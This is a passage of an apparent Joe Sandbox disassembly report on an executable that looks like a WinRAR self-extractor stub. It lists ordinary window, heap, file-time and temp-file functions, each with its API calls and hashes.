                    • _swprintf.LIBCMT ref: 004CDABE
                      • Part of subcall function 004C400A: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 004C401D
                      • Part of subcall function 004D1596: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,000000FF,00000000,00000200,00000000,00000000,?,00500EE8,00000200,004CD202,00000000,?,00000050,00500EE8), ref: 004D15B3
                    • _strlen.LIBCMT ref: 004CDADF
                    • SetDlgItemTextW.USER32(?,004FE154,?), ref: 004CDB3F
                    • GetWindowRect.USER32(?,?), ref: 004CDB79
                    • GetClientRect.USER32(?,?), ref: 004CDB85
                    • GetWindowLongW.USER32(?,000000F0), ref: 004CDC25
                    • GetWindowRect.USER32(?,?), ref: 004CDC52
                    • SetWindowTextW.USER32(?,?), ref: 004CDC95
                    • GetSystemMetrics.USER32(00000008), ref: 004CDC9D
                    • GetWindow.USER32(?,00000005), ref: 004CDCA8
                    • GetWindowRect.USER32(00000000,?), ref: 004CDCD5
                    • GetWindow.USER32(00000000,00000002), ref: 004CDD47
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1254143725.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
                    • Associated: 00000000.00000002.1254120520.00000000004C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1254239440.00000000004F3000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1254271963.00000000004FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1254271963.0000000000504000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1254271963.0000000000521000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1254341381.0000000000522000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_4c0000_findme.jbxd
                    Similarity
                    • API ID: Window$Rect$Text$ByteCharClientItemLongMetricsMultiSystemWide__vswprintf_c_l_strlen_swprintf
                    • String ID: $%s:$CAPTION$TO$d
                    • API String ID: 2407758923-3172838635
                    • Opcode ID: c8f25d5eaf33965a616b308cd2f829feb58dc7d8e5c754f237a4c5187bdaaf39
                    • Instruction ID: 2211826109ca40588a615bb0a57e5cce92e4f4b780ab26ee4fb7ecbfcea1c840
                    • Opcode Fuzzy Hash: c8f25d5eaf33965a616b308cd2f829feb58dc7d8e5c754f237a4c5187bdaaf39
                    • Instruction Fuzzy Hash: 5E81A075508341AFD720DF69CD89F6BBBE9EBC9704F04092EFA8493250D674E80ACB56
                    Function 004EC233 Relevance: 24.6, APIs: 13, Strings: 1, Instructions: 114COMMONLIBRARYCODE
                    Download Yara Rule
                    APIs
                    • ___free_lconv_mon.LIBCMT ref: 004EC277
                      • Part of subcall function 004EBE12: _free.LIBCMT ref: 004EBE2F
                      • Part of subcall function 004EBE12: _free.LIBCMT ref: 004EBE41
                      • Part of subcall function 004EBE12: _free.LIBCMT ref: 004EBE53
                      • Part of subcall function 004EBE12: _free.LIBCMT ref: 004EBE65
                      • Part of subcall function 004EBE12: _free.LIBCMT ref: 004EBE77
                      • Part of subcall function 004EBE12: _free.LIBCMT ref: 004EBE89
                      • Part of subcall function 004EBE12: _free.LIBCMT ref: 004EBE9B
                      • Part of subcall function 004EBE12: _free.LIBCMT ref: 004EBEAD
                      • Part of subcall function 004EBE12: _free.LIBCMT ref: 004EBEBF
                      • Part of subcall function 004EBE12: _free.LIBCMT ref: 004EBED1
                      • Part of subcall function 004EBE12: _free.LIBCMT ref: 004EBEE3
                      • Part of subcall function 004EBE12: _free.LIBCMT ref: 004EBEF5
                      • Part of subcall function 004EBE12: _free.LIBCMT ref: 004EBF07
                    • _free.LIBCMT ref: 004EC26C
                      • Part of subcall function 004E84DE: RtlFreeHeap.NTDLL(00000000,00000000,?,004EBFA7,004F3958,00000000,004F3958,00000000,?,004EBFCE,004F3958,00000007,004F3958,?,004EC3CB,004F3958), ref: 004E84F4
                      • Part of subcall function 004E84DE: GetLastError.KERNEL32(004F3958,?,004EBFA7,004F3958,00000000,004F3958,00000000,?,004EBFCE,004F3958,00000007,004F3958,?,004EC3CB,004F3958,004F3958), ref: 004E8506
                    • _free.LIBCMT ref: 004EC28E
                    • _free.LIBCMT ref: 004EC2A3
                    • _free.LIBCMT ref: 004EC2AE
                    • _free.LIBCMT ref: 004EC2D0
                    • _free.LIBCMT ref: 004EC2E3
                    • _free.LIBCMT ref: 004EC2F1
                    • _free.LIBCMT ref: 004EC2FC
                    • _free.LIBCMT ref: 004EC334
                    • _free.LIBCMT ref: 004EC33B
                    • _free.LIBCMT ref: 004EC358
                    • _free.LIBCMT ref: 004EC370
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1254143725.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
                    • Associated: 00000000.00000002.1254120520.00000000004C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1254239440.00000000004F3000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1254271963.00000000004FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1254271963.0000000000504000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1254271963.0000000000521000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1254341381.0000000000522000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_4c0000_findme.jbxd
                    Similarity
                    • API ID: _free$ErrorFreeHeapLast___free_lconv_mon
                    • String ID: PO
                    • API String ID: 161543041-153574497
                    • Opcode ID: 62915005dfb09a35c72176fa578f8647e8e884217acc56edf1273d9e2bdbd6aa
                    • Instruction ID: 64f35b8e11eb28ce99c6cc7d4c06114d69e4df2535bead26f8ae681f385a92ea
                    • Opcode Fuzzy Hash: 62915005dfb09a35c72176fa578f8647e8e884217acc56edf1273d9e2bdbd6aa
                    • Instruction Fuzzy Hash: A0318F31900685AFEF20AA7BD985B5B73E9FF00316F10846FE458D7691DF39AC418B58
                    Function 004DCD2E Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 79windowCOMMON
                    Download Yara Rule
                    APIs
                    • GetWindow.USER32(?,00000005), ref: 004DCD51
                    • GetClassNameW.USER32(00000000,?,00000800), ref: 004DCD7D
                      • Part of subcall function 004D17AC: CompareStringW.KERNEL32(00000400,00001001,?,000000FF,?,Function_000117AC,004CBB05,00000000,.exe,?,?,00000800,?,?,004D85DF,?), ref: 004D17C2
                    • GetWindowLongW.USER32(00000000,000000F0), ref: 004DCD99
                    • SendMessageW.USER32(00000000,00000173,00000000,00000000), ref: 004DCDB0
                    • GetObjectW.GDI32(00000000,00000018,?), ref: 004DCDC4
                    • SendMessageW.USER32(00000000,00000172,00000000,00000000), ref: 004DCDED
                    • DeleteObject.GDI32(00000000), ref: 004DCDF4
                    • GetWindow.USER32(00000000,00000002), ref: 004DCDFD
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1254143725.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
                    • Associated: 00000000.00000002.1254120520.00000000004C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1254239440.00000000004F3000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1254271963.00000000004FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1254271963.0000000000504000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1254271963.0000000000521000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1254341381.0000000000522000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_4c0000_findme.jbxd
                    Similarity
                    • API ID: Window$MessageObjectSend$ClassCompareDeleteLongNameString
                    • String ID: STATIC
                    • API String ID: 3820355801-1882779555
                    • Opcode ID: cbcf61b9c9f884d82aadda91351585368fe558e68494296f227d6f2017f4dd26
                    • Instruction ID: 0041162d4dff832cb7e7871355fca3cecd2c7cc12d0b8cfc5584efa6b2db7a4a
                    • Opcode Fuzzy Hash: cbcf61b9c9f884d82aadda91351585368fe558e68494296f227d6f2017f4dd26
                    • Instruction Fuzzy Hash: 9D1127765403117BE2316B619C5DFAF379DAF62740F004027FA02E13A2CA788D1AD6BC
                    Function 004E8EB1 Relevance: 15.1, APIs: 10, Instructions: 54COMMON
                    Download Yara Rule
                    APIs
                    • _free.LIBCMT ref: 004E8EC5
                      • Part of subcall function 004E84DE: RtlFreeHeap.NTDLL(00000000,00000000,?,004EBFA7,004F3958,00000000,004F3958,00000000,?,004EBFCE,004F3958,00000007,004F3958,?,004EC3CB,004F3958), ref: 004E84F4
                      • Part of subcall function 004E84DE: GetLastError.KERNEL32(004F3958,?,004EBFA7,004F3958,00000000,004F3958,00000000,?,004EBFCE,004F3958,00000007,004F3958,?,004EC3CB,004F3958,004F3958), ref: 004E8506
                    • _free.LIBCMT ref: 004E8ED1
                    • _free.LIBCMT ref: 004E8EDC
                    • _free.LIBCMT ref: 004E8EE7
                    • _free.LIBCMT ref: 004E8EF2
                    • _free.LIBCMT ref: 004E8EFD
                    • _free.LIBCMT ref: 004E8F08
                    • _free.LIBCMT ref: 004E8F13
                    • _free.LIBCMT ref: 004E8F1E
                    • _free.LIBCMT ref: 004E8F2C
                    Memory Dump Source
                    • Source File: 00000000.00000002.1254143725.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
                    • Associated: 00000000.00000002.1254120520.00000000004C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1254239440.00000000004F3000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1254271963.00000000004FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1254271963.0000000000504000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1254271963.0000000000521000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1254341381.0000000000522000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_4c0000_findme.jbxd
                    Similarity
                    • API ID: _free$ErrorFreeHeapLast
                    • String ID:
                    • API String ID: 776569668-0
                    • Opcode ID: b28fed7a31482f3989b7e6c2cebdc24510f81b8cee782bd150797dd1e7ad7c57
                    • Instruction ID: ae3a005dc7f25f7477bebc4489131f0b7802d98d9789fde05012cb6c4cc7ae6f
                    • Opcode Fuzzy Hash: b28fed7a31482f3989b7e6c2cebdc24510f81b8cee782bd150797dd1e7ad7c57
                    • Instruction Fuzzy Hash: BA11D47610054DBFCF11EF56C842CDA3BA5FF04355B0180AEBA0C8B6A2EA35DA519B84
                    Function 004C2162 Relevance: 14.5, APIs: 5, Strings: 3, Instructions: 480COMMON
                    Download Yara Rule
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1254143725.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
                    • Associated: 00000000.00000002.1254120520.00000000004C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1254239440.00000000004F3000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1254271963.00000000004FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1254271963.0000000000504000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1254271963.0000000000521000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1254341381.0000000000522000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_4c0000_findme.jbxd
                    Similarity
                    • API ID:
                    • String ID: ;%u$x%u$xc%u
                    • API String ID: 0-2277559157
                    • Opcode ID: 2ed3f08d9570978837bf2de8d2f8979419ff8d9b99db2b7a97ebf1d6edb79af4
                    • Instruction ID: f3f9cecc218502bf7528e251053f4c58e01201e31570d9f485dd831baf23113d
                    • Opcode Fuzzy Hash: 2ed3f08d9570978837bf2de8d2f8979419ff8d9b99db2b7a97ebf1d6edb79af4
                    • Instruction Fuzzy Hash: 9EF116786042409BDB55EF358AD5FEF77966B90304F08046FE8858B382DAEC9845C76A
                    Function 004DACD0 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 98windowCOMMON
                    Download Yara Rule
                    APIs
                      • Part of subcall function 004C130B: GetDlgItem.USER32(00000000,00003021), ref: 004C134F
                      • Part of subcall function 004C130B: SetWindowTextW.USER32(00000000,004F35B4), ref: 004C1365
                    • EndDialog.USER32(?,00000001), ref: 004DAD20
                    • SendMessageW.USER32(?,00000080,00000001,?), ref: 004DAD47
                    • SendDlgItemMessageW.USER32(?,00000066,00000172,00000000,?), ref: 004DAD60
                    • SetWindowTextW.USER32(?,?), ref: 004DAD71
                    • GetDlgItem.USER32(?,00000065), ref: 004DAD7A
                    • SendMessageW.USER32(00000000,00000435,00000000,00010000), ref: 004DAD8E
                    • SendMessageW.USER32(00000000,00000443,00000000,00000000), ref: 004DADA4
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1254143725.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
                    • Associated: 00000000.00000002.1254120520.00000000004C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1254239440.00000000004F3000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1254271963.00000000004FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1254271963.0000000000504000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1254271963.0000000000521000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1254341381.0000000000522000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_4c0000_findme.jbxd
                    Similarity
                    • API ID: MessageSend$Item$TextWindow$Dialog
                    • String ID: LICENSEDLG
                    • API String ID: 3214253823-2177901306
                    • Opcode ID: 7964b2462a1c0103c7f5599a3c9d63354216c0b3974241c89195d15b02844a05
                    • Instruction ID: 9dfb84e12608b984f9f69781f3fbff1d6ce6fb0ae5ab1d88a292c0e382192a18
                    • Opcode Fuzzy Hash: 7964b2462a1c0103c7f5599a3c9d63354216c0b3974241c89195d15b02844a05
                    • Instruction Fuzzy Hash: 1B21F832244104BBE2215F21EC4EF7B3BAEEB57B4AF00400BF604926A0DB595D16F63A
                    Function 004C9443 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 136fileCOMMON
                    Download Yara Rule
                    APIs
                    • __EH_prolog.LIBCMT ref: 004C9448
                    • GetLongPathNameW.KERNEL32(?,?,00000800), ref: 004C946B
                    • GetShortPathNameW.KERNEL32(?,?,00000800), ref: 004C948A
                      • Part of subcall function 004D17AC: CompareStringW.KERNEL32(00000400,00001001,?,000000FF,?,Function_000117AC,004CBB05,00000000,.exe,?,?,00000800,?,?,004D85DF,?), ref: 004D17C2
                    • _swprintf.LIBCMT ref: 004C9526
                      • Part of subcall function 004C400A: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 004C401D
                    • MoveFileW.KERNEL32(?,?), ref: 004C9595
                    • MoveFileW.KERNEL32(?,?), ref: 004C95D5
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1254143725.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
                    • Associated: 00000000.00000002.1254120520.00000000004C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1254239440.00000000004F3000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1254271963.00000000004FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1254271963.0000000000504000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1254271963.0000000000521000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1254341381.0000000000522000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_4c0000_findme.jbxd
                    Similarity
                    • API ID: FileMoveNamePath$CompareH_prologLongShortString__vswprintf_c_l_swprintf
                    • String ID: rtmp%d
                    • API String ID: 2111052971-3303766350
                    • Opcode ID: 6deaa99e4b562ca39caac5bd30a64c487ec55687a5d69f99d8e46f059eea3770
                    • Instruction ID: 02cbe5a03fe24a39fd0ec9c10be27c983e6f402f76c5adf1ac0ecfe8ab9bff01
                    • Opcode Fuzzy Hash: 6deaa99e4b562ca39caac5bd30a64c487ec55687a5d69f99d8e46f059eea3770
                    • Instruction Fuzzy Hash: AC416079900158B6CB60EB618C89FEB737CAF11384F0444AFB549A3151EB3C9F89CA6C
                    Function 004D8E62 Relevance: 12.4, APIs: 3, Strings: 4, Instructions: 125memoryCOMMON
                    Download Yara Rule
                    APIs
                    • GlobalAlloc.KERNEL32(00000040,?), ref: 004D8F38
                    • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,00000000,000000FF,00000003,?,00000000,00000000), ref: 004D8F59
                    • CreateStreamOnHGlobal.COMBASE(00000000,00000001,00000000), ref: 004D8F80
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1254143725.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
                    • Associated: 00000000.00000002.1254120520.00000000004C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1254239440.00000000004F3000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1254271963.00000000004FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1254271963.0000000000504000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1254271963.0000000000521000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1254341381.0000000000522000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_4c0000_findme.jbxd
                    Similarity
                    • API ID: Global$AllocByteCharCreateMultiStreamWide
                    • String ID: </html>$<head><meta http-equiv="content-type" content="text/html; charset=$<html>$utf-8"></head>
                    • API String ID: 4094277203-4209811716
                    • Opcode ID: b3a0f90c5f88575b17c9fd6259e05bcb8f9156816775676ce9b6b6582bb24126
                    • Instruction ID: e256f7a234ea752cc900233d219bdcb7807daee92410071e8bbc7fd71b832f7d
                    • Opcode Fuzzy Hash: b3a0f90c5f88575b17c9fd6259e05bcb8f9156816775676ce9b6b6582bb24126
                    • Instruction Fuzzy Hash: 4A3125311083457BD721AB629C46F7BB7989F81725F10041FF901A73C1EF6C9A0983AD
                    Function 004E8FA5 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 50COMMONLIBRARYCODE
                    Download Yara Rule
                    APIs
                    • GetLastError.KERNEL32(?,00500EE8,004E3E14,00500EE8,?,?,004E3713,00000050,?,00500EE8,00000200), ref: 004E8FA9
                    • _free.LIBCMT ref: 004E8FDC
                    • _free.LIBCMT ref: 004E9004
                    • SetLastError.KERNEL32(00000000,?,00500EE8,00000200), ref: 004E9011
                    • SetLastError.KERNEL32(00000000,?,00500EE8,00000200), ref: 004E901D
                    • _abort.LIBCMT ref: 004E9023
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1254143725.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
                    • Associated: 00000000.00000002.1254120520.00000000004C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1254239440.00000000004F3000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1254271963.00000000004FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1254271963.0000000000504000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1254271963.0000000000521000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1254341381.0000000000522000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_4c0000_findme.jbxd
                    Similarity
                    • API ID: ErrorLast$_free$_abort
                    • String ID: XO
                    • API String ID: 3160817290-962008992
                    • Opcode ID: a34624dc025a640294293415df0c073be660cfc7bf7c592944b3e28745064a62
                    • Instruction ID: ceb69ceb365d327d77ff0bdbb2f6ebe4e3cfd078b32d5959d739e5146dd3d41a
                    • Opcode Fuzzy Hash: a34624dc025a640294293415df0c073be660cfc7bf7c592944b3e28745064a62
                    • Instruction Fuzzy Hash: DFF0F9755049906ACA1137376C09B3B19159FD176BB24012FF41DD22D2EE2C8D22911E
                    Function 004D0A8A Relevance: 12.1, APIs: 8, Instructions: 115timeCOMMON
                    Download Yara Rule
                    APIs
                    • __aulldiv.LIBCMT ref: 004D0A9D
                      • Part of subcall function 004CACF5: GetVersionExW.KERNEL32(?), ref: 004CAD1A
                    • FileTimeToLocalFileTime.KERNEL32(?,00000001,00000000,?,00000064,00000000,00000001,00000000,?), ref: 004D0AC0
                    • FileTimeToSystemTime.KERNEL32(?,?,00000000,?,00000064,00000000,00000001,00000000,?), ref: 004D0AD2
                    • SystemTimeToTzSpecificLocalTime.KERNEL32(00000000,?,?), ref: 004D0AE3
                    • SystemTimeToFileTime.KERNEL32(?,?), ref: 004D0AF3
                    • SystemTimeToFileTime.KERNEL32(?,?), ref: 004D0B03
                    • FileTimeToSystemTime.KERNEL32(?,?), ref: 004D0B3D
                    • __aullrem.LIBCMT ref: 004D0BCB
                    Memory Dump Source
                    • Source File: 00000000.00000002.1254143725.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
                    • Associated: 00000000.00000002.1254120520.00000000004C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1254239440.00000000004F3000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1254271963.00000000004FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1254271963.0000000000504000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1254271963.0000000000521000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1254341381.0000000000522000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_4c0000_findme.jbxd
                    Similarity
                    • API ID: Time$File$System$Local$SpecificVersion__aulldiv__aullrem
                    • String ID:
                    • API String ID: 1247370737-0
                    • Opcode ID: 0b1faa8c3168155fd8a08cb4cc6a928b17232bf11227adbc4ac31139be4bdac4
                    • Instruction ID: 0bdaa6405e4588039895990039baf803d4738df80073e262a2cb572b8c749932
                    • Opcode Fuzzy Hash: 0b1faa8c3168155fd8a08cb4cc6a928b17232bf11227adbc4ac31139be4bdac4
                    • Instruction Fuzzy Hash: 86414CB14083059FC310DF65C890A6BFBF8FB88715F00492FF59692610E738E549CB55
                    Function 004EEE2D Relevance: 10.7, APIs: 7, Instructions: 152fileCOMMON
                    Download Yara Rule
                    APIs
                    • GetConsoleCP.KERNEL32(?,00000000,?,?,?,?,?,?,?,004EF5A2,?,00000000,?,00000000,00000000), ref: 004EEE6F
                    • __fassign.LIBCMT ref: 004EEEEA
                    • __fassign.LIBCMT ref: 004EEF05
                    • WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000001,?,00000005,00000000,00000000), ref: 004EEF2B
                    • WriteFile.KERNEL32(?,?,00000000,004EF5A2,00000000,?,?,?,?,?,?,?,?,?,004EF5A2,?), ref: 004EEF4A
                    • WriteFile.KERNEL32(?,?,00000001,004EF5A2,00000000,?,?,?,?,?,?,?,?,?,004EF5A2,?), ref: 004EEF83
                    Memory Dump Source
                    • Source File: 00000000.00000002.1254143725.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
                    • Associated: 00000000.00000002.1254120520.00000000004C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1254239440.00000000004F3000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1254271963.00000000004FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1254271963.0000000000504000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1254271963.0000000000521000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1254341381.0000000000522000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_4c0000_findme.jbxd
                    Similarity
                    • API ID: FileWrite__fassign$ByteCharConsoleMultiWide
                    • String ID:
                    • API String ID: 1324828854-0
                    • Opcode ID: eeaf980562520434639a9ce41591ba15202bd699d7e1d3967cf5080466033c39
                    • Instruction ID: c04cfedc24eafe377fbbaec1565987c70a8744d6acac1cb01b2f96bccd346520
                    • Opcode Fuzzy Hash: eeaf980562520434639a9ce41591ba15202bd699d7e1d3967cf5080466033c39
                    • Instruction Fuzzy Hash: 3051F770900248AFCB10CFAADC81AEEBBF9EF09301F24416BF555E7291D7349941CB68
                    Function 004DC534 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 135COMMON
                    Download Yara Rule
                    APIs
                    • GetTempPathW.KERNEL32(00000800,?), ref: 004DC54A
                    • _swprintf.LIBCMT ref: 004DC57E
                      • Part of subcall function 004C400A: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 004C401D
                    • SetDlgItemTextW.USER32(?,00000066,0050946A), ref: 004DC59E
                    • _wcschr.LIBVCRUNTIME ref: 004DC5D1
                    • EndDialog.USER32(?,00000001), ref: 004DC6B2
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1254143725.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
                    • Associated: 00000000.00000002.1254120520.00000000004C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1254239440.00000000004F3000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1254271963.00000000004FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1254271963.0000000000504000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1254271963.0000000000521000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1254341381.0000000000522000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_4c0000_findme.jbxd
                    Similarity
                    • API ID: DialogItemPathTempText__vswprintf_c_l_swprintf_wcschr
                    • String ID: %s%s%u
                    • API String ID: 2892007947-1360425832
                    • Opcode ID: b8bf4d0ee3b57b693261cc20e3925a41c02b25bfe82e3ce49f36233cd7637a38
                    • Instruction ID: a7af0f4c1e4e8da2d5753b40060249aa8daced6a33f10d7d4a374c9191d4718d
                    • Opcode Fuzzy Hash: b8bf4d0ee3b57b693261cc20e3925a41c02b25bfe82e3ce49f36233cd7637a38
                    • Instruction Fuzzy Hash: C641F575900618BADF21DBA0CC95FEA77BCEF18305F0040A7E509E6261E7799BC8CB59
                    Function 004D9635 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 108COMMON
                    Download Yara Rule
                    APIs
                    • ShowWindow.USER32(?,00000000), ref: 004D964E
                    • GetWindowRect.USER32(?,00000000), ref: 004D9693
                    • ShowWindow.USER32(?,00000005,00000000), ref: 004D972A
                    • SetWindowTextW.USER32(?,00000000), ref: 004D9732
                    • ShowWindow.USER32(00000000,00000005), ref: 004D9748
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.1254143725.00000000004C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 004C0000, based on PE: true
                    • Associated: 00000000.00000002.1254120520.00000000004C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1254239440.00000000004F3000.00000002.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1254271963.00000000004FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1254271963.0000000000504000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1254271963.0000000000521000.00000004.00000001.01000000.00000003.sdmpDownload File
                    • Associated: 00000000.00000002.1254341381.0000000000522000.00000002.00000001.01000000.00000003.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_4c0000_findme.jbxd
                    Similarity
                    • API ID: Window$Show$RectText
                    • String ID: RarHtmlClassName
                    • API String ID: 3937224194-1658105358
                    • Opcode ID: ba22d8490f9a9fcc8a2f2b15f300e9d7b0bf82d6dc2f94f3636aef9cc0b20198
